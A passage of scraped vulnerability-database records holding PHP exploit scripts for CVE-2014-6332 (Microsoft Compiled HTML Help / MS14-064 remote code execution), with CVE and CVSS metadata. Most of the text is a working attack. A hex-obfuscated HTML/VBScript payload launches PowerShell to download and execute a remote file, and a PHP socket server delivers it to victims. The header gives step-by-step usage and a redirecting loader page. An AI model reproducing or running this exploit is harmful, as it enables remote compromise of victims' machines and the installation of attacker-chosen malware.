\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x
65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x41\\x76\\x61\\x6E\\x74\\x20\\x42\\x72\\x6F\\x77\\x73\\x65\\x72\\x20\\x52\\x65\\x6D\\x6F\\x74\\x65\\x20\\x43\\x6F\\x64\\x65\\x20\\x45\\x78\\x65\\x63\\x75\\x74\\x69\\x6F\\x6E\\x20\\x44\\x65\\x6D\\x6F\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"DOWNLOAD\",$link,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . 
\n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134062/htmlcompiler-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:21:02", "description": "", "cvss3": {}, "published": "2015-10-23T00:00:00", "type": "packetstorm", "title": "Microsoft Compiled HTML Help Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-23T00:00:00", "id": "PACKETSTORM:134064", "href": "https://packetstormsecurity.com/files/134064/Microsoft-Compiled-HTML-Help-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : Microsoft Compiled HTML Help - Remote Code Execution \n# Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. \n# Version : All \n# Date : 23 October 2015 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n########################################################## \n# 1. run php code : php exploit.php \n# 2. convert the loader.html file to a chm file using chmProcessor. \n# 3. open the output. \n# 4. enjoy ! 
\n########################################################## \n# loader.html: \n# <html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=http://[Your IP Address]\"></head><body>Ehsan Noreddini</body></html> \n########################################################## \n# shot : http://ehsann.info/proof/Microsoft_Compiled_HTML_help_R_C_E.png \n# Original Code : http://ehsann.info/exploit/5.txt \n# video : http://ehsann.info/video/Microsoft_Compiled_HTML_help_R_C_E.mp4 \n########################################################## \n \nprint \"Microsoft Compiled HTML Help - Remote Code Execution Exploit \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$exp = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x2
9\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x6
9\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x